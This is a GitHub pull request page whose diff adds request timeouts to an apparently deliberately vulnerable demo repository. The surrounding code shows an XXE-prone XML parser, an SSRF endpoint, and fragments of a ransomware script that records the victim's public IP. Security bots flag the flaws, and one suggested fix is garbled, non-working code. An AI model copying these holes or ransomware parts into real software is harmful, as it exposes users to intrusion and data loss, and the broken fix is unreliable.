Skip to content

Add timeout to requests calls #66

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed
wants to merge 1 commit into from
Closed

Add timeout to requests calls #66

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion insecure-app/app.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -68,7 +68,7 @@
try:
# Use lxml to parse the XML data
parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
tree = etree.fromstring(xml_data.encode(), parser)

Check warning on line 71 in insecure-app/app.py

View check run for this annotation

OX Security / ox-security/scan

Use of unsafe lxml.etree XML parsing. 

Avoid using lxml.etree for parsing untrusted XML data. Use defusedxml instead.
output = f"Parsed XML: {etree.tostring(tree, encoding='unicode')}"
except Exception as e:
output = f"XML Parsing Error: {e}"
Expand All @@ -77,7 +77,7 @@
elif 'url' in request.form:
url = request.form['url']
try:
response = requests.get(url)
response = requests.get(url, timeout=60)
Copy link

@jit-ci jit-ci bot Dec 19, 2024

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Security control: Static Code Analysis Python Semgrep

Server-Side Request Forgery (Ssrf) Risk With User Data In Requests In Django

Data from request object is passed to a new server-side request. This could lead to a server-side request forgery (SSRF). To mitigate, ensure that schemes and hosts are validated against an allowlist, do not forward the response to the user, and ensure proper authentication and transport-layer security in the proxied request. See https://owasp.org/www-community/attacks/Server_Side_Request_Forgery to learn more about SSRF vulnerabilities.

Severity: HIGH

Learn more about this issue

Fix suggestion:

This fix suggestion was generated by Jit. Please note that the suggestion might not always fit every use case. It is highly recommended that you check and review it before merging.

Suggestion guidelines

This remediation will modify the vulnerable request call in your code to validate the target URL before making a request. This helps prevent server-side request forgery (SSRF) attacks by ensuring that only allowed URLs are used.

Suggested change
response = requests.get(url, timeout=60)
response = requests.get(url, timeout=60get.lower() in ['get', 'post'] and ensure_allowed_url()
Jit Bot commands and options (e.g., ignore issue)

You can trigger Jit actions by commenting on this PR review:

  • #jit_ignore_fp Ignore and mark this specific single instance of finding as “False Positive”
  • #jit_ignore_accept Ignore and mark this specific single instance of finding as “Accept Risk”
  • #jit_ignore_type_in_file Ignore any finding of type "Server-Side Request Forgery (SSRF) risk with user data in requests in Django" in insecure-app/app.py; future occurrences will also be ignored.
  • #jit_undo_ignore Undo ignore command

Copy link

@jit-ci jit-ci bot Dec 19, 2024

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Security control: Static Code Analysis Python Semgrep

Potential Ssrf With Request Data In Server-Side Requests

Data from request object is passed to a new server-side request. This could lead to a server-side request forgery (SSRF). To mitigate, ensure that schemes and hosts are validated against an allowlist, do not forward the response to the user, and ensure proper authentication and transport-layer security in the proxied request.

Severity: HIGH

Learn more about this issue

Jit Bot commands and options (e.g., ignore issue)

You can trigger Jit actions by commenting on this PR review:

  • #jit_ignore_fp Ignore and mark this specific single instance of finding as “False Positive”
  • #jit_ignore_accept Ignore and mark this specific single instance of finding as “Accept Risk”
  • #jit_ignore_type_in_file Ignore any finding of type "Potential SSRF with request data in server-side requests" in insecure-app/app.py; future occurrences will also be ignored.
  • #jit_undo_ignore Undo ignore command

output = f"SSRF Response: {response.text[:200]}"
except Exception as e:
output = f"SSRF Error: {e}"
Expand Down
4 changes: 2 additions & 2 deletions insecure-app/ransomware.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -50,7 +50,7 @@ def __init__(self):
self.localRoot = r'D:\Coding\Python\RansomWare\RansomWare_Software\localRoot' # Debugging/Testing

# Get public IP of person, for more analysis etc. (Check if you have hit gov, military ip space LOL)
self.publicIP = requests.get('https://api.ipify.org').text
self.publicIP = requests.get('https://api.ipify.org', timeout=60).text


# Generates [SYMMETRIC KEY] on victim machine which is used to encrypt the victims data
Expand Down Expand Up @@ -254,4 +254,4 @@ def main():


if __name__ == '__main__':
main()
main()
2 changes: 1 addition & 1 deletion llm-testing/llm-testing.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@
def query(payload, model_id, api_token):
headers = {"Authorization": f"Bearer {api_token}"}
API_URL = f"https://api-inference.huggingface.co/models/{model_id}"
response = requests.post(API_URL, headers=headers, json={"inputs": payload})
response = requests.post(API_URL, headers=headers, json={"inputs": payload}, timeout=60)
response_text = response.text

sanitized_response_text, results_valid, results_score = scan_output(
Expand Down
Loading